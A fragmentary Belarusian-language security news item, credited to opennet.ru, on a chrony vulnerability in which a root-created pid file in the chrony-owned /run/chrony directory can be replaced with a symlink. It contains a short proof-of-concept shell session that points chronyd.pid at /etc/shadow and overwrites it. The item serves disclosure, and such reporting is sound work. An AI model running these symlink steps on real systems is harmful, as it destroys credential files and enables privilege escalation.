В
Уразлівасць выклікана небяспечным стварэннем pid-файла, які ствараўся на этапе, калі chrony яшчэ не скінуў прывілеі і выконваецца з правамі root. Пры гэтым каталог /run/chrony, у які запісваецца pid-файл, ствараўся з правамі 0750 праз systemd-tmpfiles або пры запуску chronyd у прывязцы да карыстача і групе "chrony". Такім чынам, пры наяўнасці доступу да карыстача chrony маецца магчымасць замены pid-файла /run/chrony/chronyd.pid на сімвалічную спасылку. Сімвалічная спасылка можа ўказваць на любы сістэмны файл, які будзе перапісаны ў момант запуску chronyd.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ exit
root# /usr/sbin/chronyd -n
^C
# замест зьместу /etc/shadow будзе захаваны ідэнтыфікатар працэсу chronyd
root# cat /etc/shadow
15287
ўразлівасць
SUSE і openSUSE праблеме
Крыніца: opennet.ru